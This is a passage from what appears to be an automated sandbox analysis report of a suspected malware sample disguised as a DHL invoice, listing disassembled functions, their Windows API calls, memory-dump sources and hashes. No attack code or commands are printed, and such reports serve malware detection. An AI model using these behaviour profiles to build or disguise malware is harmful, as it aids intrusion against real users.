                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00391617
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0039161E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1592001646-0
                                                                                                                        • Opcode ID: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                                                                                                                        • Instruction ID: 95ddcf0473b55c4ba3f7889cc4eecd279eda924eade2f774c3161efb01ef2b4f
                                                                                                                        • Opcode Fuzzy Hash: becb190ee9281ff5faffd19cb170258b09d38dda5cc31dcc3feaf1257041c65c
                                                                                                                        • Instruction Fuzzy Hash: 02217832E4010AAFDF12DFA4C945BEEB7B8EF45344F0A4459E845BB241E730AA05CBA0
                                                                                                                        Function 003C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003C280A
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2824
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003C2832
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003C2840
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                                                                                                                        • Instruction ID: 0796af52e4974af942ec8f2df06a6833478c89560e4e4d0448032d4a9a411893
                                                                                                                        • Opcode Fuzzy Hash: bbe8292df8be0d3ce9785e94a1e7e1aa88ca51a96b5baa20410138c615bc1dd7
                                                                                                                        • Instruction Fuzzy Hash: F121A135204611AFD7169B24C895FAB7B99AF46324F15815CF42ACB6E2CB71FC42CB90
                                                                                                                        Function 003978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00398D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398D8C
                                                                                                                          • Part of subcall function 00398D7D: lstrcpyW.KERNEL32(00000000,?,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00398DB2
                                                                                                                          • Part of subcall function 00398D7D: lstrcmpiW.KERNEL32(00000000,?,0039790A,?,000000FF,?,00398754,00000000,?,0000001C,?,?), ref: 00398DE3
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397923
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397949
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00398754,00000000,?,0000001C,?,?,00000000), ref: 00397984
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: 2b1795667bbb0d25800dc466ed475b8d78eca9eacb42fb80d4616ca07e171d75
                                                                                                                        • Instruction ID: 16b698e8333b539ea5ab66d2ec50087ade0f5d4b5570780393464c2f931032da
                                                                                                                        • Opcode Fuzzy Hash: 2b1795667bbb0d25800dc466ed475b8d78eca9eacb42fb80d4616ca07e171d75
                                                                                                                        • Instruction Fuzzy Hash: 3611D67A210242AFDF165F39D845E7A77A9FF85350B50402AF946CB2A4EF319811C751
                                                                                                                        Function 003C5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 003C56BB
                                                                                                                        • _wcslen.LIBCMT ref: 003C56CD
                                                                                                                        • _wcslen.LIBCMT ref: 003C56D8
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 455545452-0
                                                                                                                        • Opcode ID: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                                                                                                                        • Instruction ID: 22287c36b5ac00fff2bdcd830440f22e9b75c4402d7990ab78637c68218876bb
                                                                                                                        • Opcode Fuzzy Hash: d115021dba045e2c7619f5966edcd41ae941ec03a878864337fcb684d053ecde
                                                                                                                        • Instruction Fuzzy Hash: FF11E13160060896DB229F61CC85FEE77ACAF10364F10406EF905D6081E770EEC4CB60
                                                                                                                        Function 00391A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00391A47
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A59
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A6F
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00391A8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                                                                                                                        • Instruction ID: b90c88207dc31e11f5da24d8cb07e489e1f301bd39096a200b6d630b10bad62f
                                                                                                                        • Opcode Fuzzy Hash: 252c451c9a1c749a267d02c3cc2d3ca4cc85359389774f021ac9b91759922082
                                                                                                                        • Instruction Fuzzy Hash: 9511F73AD01219FFEF119BA5C985FADFB78EB08750F210091EA04B7290D671AE50DB94
                                                                                                                        Function 0039E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0039E1FD
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0039E230
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0039E246
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0039E24D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                                                                                                                        • Instruction ID: e305e04b62d5c1863d0e14dc17cfa75b1e98893502a2397268daf138d22a0d7b
                                                                                                                        • Opcode Fuzzy Hash: 6dff2890a04f465b7c24921b8df5e396269c7fb73e0cea2b2a69b8c0efc0d7ee
                                                                                                                        • Instruction Fuzzy Hash: C3112B76D04258BFDB02EFA8DC05E9E7FACEB45310F144625F824E3691D670DD0487A0
                                                                                                                        Function 0035D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,?,0035CFF9,00000000,00000004,00000000), ref: 0035D218
                                                                                                                        • GetLastError.KERNEL32 ref: 0035D224
                                                                                                                        • __dosmaperr.LIBCMT ref: 0035D22B
                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0035D249
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 173952441-0
                                                                                                                        • Opcode ID: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                                                                                                                        • Instruction ID: 3d98d1210983d9bbedcfbfe07f175b4b80c5c73e094e9e9eef0fc06e003adedb
                                                                                                                        • Opcode Fuzzy Hash: 96242d295d49999ea6a66df7ba22a920d0d036a22ce4ffcc0f71628d2cef30d7
                                                                                                                        • Instruction Fuzzy Hash: 0701D276815208BBCB235BA6DC09FAE7A6DDF81332F114619FD259A1F0DB708909C7A0
                                                                                                                        Function 0033600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00336060
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3970641297-0
                                                                                                                        • Opcode ID: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                                                                                                                        • Instruction ID: 5fe8a6a40ba88ca14cd9fbb9980663d0ce1b1f74985f7765a2e189c446f76f55
                                                                                                                        • Opcode Fuzzy Hash: c071925fb33fc8890f599033fb8b1517f20c497f8971d13321953eafe36b2f3a
                                                                                                                        • Instruction Fuzzy Hash: FD116D72505508BFEF174FA49C86EEABB6DEF093A4F055215FA1992120D732EC60DBA0
                                                                                                                        Function 00353B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00353B56
                                                                                                                          • Part of subcall function 00353AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00353AD2
                                                                                                                          • Part of subcall function 00353AA3: ___AdjustPointer.LIBCMT ref: 00353AED
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00353B6B
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00353B7C
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00353BA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction ID: 328b1b9ceca077ebae6c275da7bf5cf183d039f03c87f4b4e1d023ef9d03f0be
                                                                                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction Fuzzy Hash: 43012932100148BBDF125E95CC42EEB3B69EF48799F054014FE489A121D732E965DBA0
                                                                                                                        Function 00363073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003313C6,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue), ref: 003630A5
                                                                                                                        • GetLastError.KERNEL32(?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000,00000364,?,00362E46), ref: 003630B1
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0036301A,003313C6,00000000,00000000,00000000,?,0036328B,00000006,FlsSetValue,003D2290,FlsSetValue,00000000), ref: 003630BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                                                                                                                        • Instruction ID: 14b6001cfe5ccbd64f426a1cad2271099d006b326be3a7b1b6db24be0579c591
                                                                                                                        • Opcode Fuzzy Hash: dcfeb7587554f5c3cc3cb6b381f953760c2eeafe6b7f07672caedc2aaa285798
                                                                                                                        • Instruction Fuzzy Hash: 2601D432312222ABCB334A79AC44E677B9CEF05BA1F158620F90BE3144C721D909C7E0
                                                                                                                        Function 00397464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0039747F
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00397497
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003974AC
                                                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003974CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352324309-0
                                                                                                                        • Opcode ID: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                                                                                                                        • Instruction ID: 31dcb48a65d0d69c7d69db084c395a858fb500c3c8272f4919f707f022109f0e
                                                                                                                        • Opcode Fuzzy Hash: d2a79ecbbbde147024c78c28035aaddb79c657b4de3b3830c309ca35eb5038b5
                                                                                                                        • Instruction Fuzzy Hash: 9011A1B12253119BEB228F16DC08FA27BFCEF00B00F108569E61AD6592D770F904DB90
                                                                                                                        Function 0039B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0C4
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0E9
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B0F3
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0039ACD3,?,00008000), ref: 0039B126
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                                                                                                                        • Instruction ID: 5aa50fccbcf7564c65267e614600d0050d59634a18402beb44df3b7498229d0a
                                                                                                                        • Opcode Fuzzy Hash: 8cc352cc95c4bdd5cd90a2eaedf631f473f4fe06673d4f36ff2e97c4632d3168
                                                                                                                        • Instruction Fuzzy Hash: 8E115B31C0162DE7CF02AFE5EA69AEEFB78FF49711F114095D981B2281CB3056508B91
                                                                                                                        Function 00392DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00392DDD
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                                                                                                                        • Instruction ID: 6e8126733ea5ce9b9ad53f958f15ac74ecd2fa22d482779ac12e2a905dc37453
                                                                                                                        • Opcode Fuzzy Hash: 1e131850ba63beed908f9e0f919ec2a0ea450831763c013580ccfcb22db6d554
                                                                                                                        • Instruction Fuzzy Hash: E5E09272511624BBDB221B739C0DFEB3E6CFF42BA1F051015F10AD10809AA4D841C7B0
                                                                                                                        Function 003C8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                                                                                                                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                                                                                                                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                                                                                                                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 003C8887
                                                                                                                        • LineTo.GDI32(?,?,?), ref: 003C8894
                                                                                                                        • EndPath.GDI32(?), ref: 003C88A4
                                                                                                                        • StrokePath.GDI32(?), ref: 003C88B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
